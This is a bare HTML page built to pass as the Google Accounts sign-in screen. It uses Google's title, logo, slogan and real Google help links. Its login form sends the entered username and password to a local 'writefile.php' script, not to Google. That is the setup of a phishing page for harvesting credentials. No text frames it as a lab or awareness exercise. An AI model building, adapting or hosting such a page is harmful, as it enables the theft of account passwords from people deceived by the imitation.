<html>

<head>
<title>Sign in - Google Accounts</title>
<style type="text/css">

box
{height:580px;
width:354px;

}
img[src="google_2015_logo_detail.png"]{
margin:25px auto 20px;
float:none; 
display:block;
height:38px;
width: 116px;
}

#title1
{

margin-bottom: 15px;
font-family:'Open Sans', arial;
color:#555;
text-align: center;
font-size:38px;
}

#title2
{

font-family:'Open Sans', arial;
color:#555; 
font-size:18px;
font-weight:400;
margin-bottom:20px;
text-align:center;
}

#h2{
font-size: 4px;
color:#262626;
margin: 0 0 15px;
font-weight: bold;}

#box{ 
margin:0 auto 0;
margin-bottom: 10px;
height:300px;
position: relative;
overflow:hidden;
width: 354px;
padding:40px 40px;
background-color:#f7f7f7;
box-shadow: 2px 2px 2px grey;
}
img[src="default-user.png"]{ 
margin: 0 auto 0;
position: relative;
height:96px; 
width:96px;
border-radius:50%;
overflow:hidden;
background-repeat:no-repeat;
background-position:center center;

}
input[name="un"]{
margin: 0 auto 0;
direction:ltr;
margin-bottom: 0;
height:44px; 
font-size:16px;
margin-top:16px;
z-index:3;
width: 274px;
display:block;
}
input[name="pw"]{
margin: 0 auto 0;
direction:ltr;
margin-bottom: 5px;
height:44px; 
font-size:16px;
margin-top:16px;
z-index:3;
width:274px;
display:block;}

a#findAccountLink
{
float:right;
text-align:right;
font-size:13px;
color:#427fed;
cursor: pointer;
text-decoration: none;
margin-right: 45px;
}

a#findAccountLinkA
{
margin-top: 15px;
font-size:13px;
color:#427fed;
cursor: pointer;
text-decoration: none;
}

input[name="submit"]{
padding:0;
color:white;
height:36px;
margin: 0 auto 0;
width:274px; 
display:block;
margin-bottom: 10px;
z-index:1;
position:relative; 
border: 1px solid #2f5bb7;
border-radius:3px; 
color #fff; 
text-shadow: 0 1px rgba(0,0,0,0,3);
background-color:#3571e8;
background-image:-moz-linear-gradient(top,#4d90fe,#357ae8)
}
</style>
</head>

<body>
<div id="logo"><img src="google_2015_logo_detail.png" alt="google Logo"></div><div id ="container">
<div id="title1">
One account. All of Google.
</div>
<div id="title2">Sign in to continue to Google.</div>
<div id="box">


<div id="space"> </div>
<center>
<img src="default-user.png" alt="user"></center><br>
<form action="writefile.php" method="post">
<input type="text" name="un" id="userName">
<input type="password" name="pw" id="passWord">
<input type="button" name="submit" id="submit" value="Sign in">
</form>
<div id="findAccountLink" name="findAccountLink"><a id="findAccountLink" href="https://accounts.google.com/signin/usernamerecovery?continue=https%3A%2F%2Fwww.google.com%2F&hl=en">Find My account</a></div>


</div>
<a id="findAccountLinkA" href= "https://accounts.google.com/ServiceLogin?hl=en&passive=true&continue=https://www.google.com/#identifier"><center>Create account</center></a>
</br></br>
<center><img src="footer.png"></center>
</div>
</div>
</body>

</html>
